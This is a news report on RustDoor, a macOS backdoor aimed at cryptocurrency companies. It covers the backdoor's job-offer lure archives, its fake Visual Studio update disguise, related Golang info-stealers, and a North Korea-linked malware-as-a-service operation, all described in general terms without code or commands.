Several companies in the cryptocurrency sector are under threat from a newly discovered Apple macOS backdoor named RustDoor.
RustDoor, a Rust-based malware capable of harvesting and uploading files as well as gathering information, was first documented by Bitdefender. It’s distributed by masquerading itself as a Visual Studio update.
While at least three different variants of the backdoor have been identified, the exact initial propagation mechanism remains unknown.
Bitdefender told The Hacker News that the malware was used as part of a targeted attack, noting that it found additional artifacts responsible for downloading and executing RustDoor.
“Some of these first stage downloaders claim to be PDF files with job offerings, but in reality, are scripts that download and execute the malware while also downloading and opening an innocuous PDF file that bills itself as a confidentiality agreement,” said Bogdan Botezatu, director of threat research and reporting at Bitdefender.
Three more malicious samples acting as first-stage payloads have come to light, each purporting to be a job offering. These ZIP archives predate the earlier RustDoor binaries by nearly a month.
The new component of the attack chain, the archive files (“Jobinfo.app.zip” or “Jobinfo.zip”), contains a basic shell script responsible for fetching the implant and previewing a harmless decoy PDF file (“job.pdf”) hosted on the same site as a distraction.
Bitdefender said it also detected four new Golang-based binaries that communicate with an actor-controlled domain and collect information about the victim’s machine and its network connections.
In addition, the binaries can extract details about the disk and retrieve a wide list of kernel parameters and configuration values.
A closer investigation of the command-and-control (C2) infrastructure revealed a leaky endpoint that allows gathering details about the currently infected victims.
The development comes as South Korea’s National Intelligence Service (NIS) revealed that an IT organization affiliated with North Korea’s Workers’ Party is generating illicit revenue by selling malware-laced gambling websites to other cybercriminals for stealing sensitive data.
The company behind the malware-as-a-service (MaaS) scheme is Gyeongheung, a 15-member entity based in Dandong that has allegedly received payments from South Korean organizations.